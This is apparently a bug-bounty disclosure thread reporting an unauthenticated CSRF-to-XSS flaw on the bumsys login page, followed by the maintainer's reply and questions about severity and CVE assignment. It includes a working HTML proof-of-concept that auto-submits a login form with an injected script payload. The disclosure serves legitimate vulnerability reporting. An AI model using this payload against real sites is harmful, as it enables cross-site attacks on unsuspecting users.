Unauthenticated CSRF to XSS on login page in unilogies/bumsys
Jan 27th 2023
To exploid the vulnerability, since the it is a
POST request, it's necessary an HTML poc in order to trigger a CSRF on the login form which exploits the XSS
Proof of Concept
- insert in a empty HTML file this PoC:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://demo.bumsys.org/login/" method="POST"> <input type="hidden" name="user-email" value="">"><body onpageshow=alert(document.domain)>" /> <input type="hidden" name="user-password" value="12345678" /> <input type="hidden" name="keepAlive" value="on" /> </form> <script> document.forms.submit(); </script> </body> </html>
- Now open the file just created in a browser when the user it's not authenticated. This is the result:
Thank you so much for reporting this issue. We will fix this in next release.
Thank you for the quick response. Is the report elegible for CVE once fixed?
@leorac, Is there any way to get the access of admin panel by using this issue?
Since this is unauthenticated, it's not possible to exfiltrate cookies in order to takeover other users session. That's why I've set as medium severity. Anyway it's possible to use this issue chained with other vulnerabilities and for tracking the user behaviour.
@admin is it possible to have CVE for this?
CVE assignment is up to the maintainer, please refrain from tagging admins for this request. Thanks!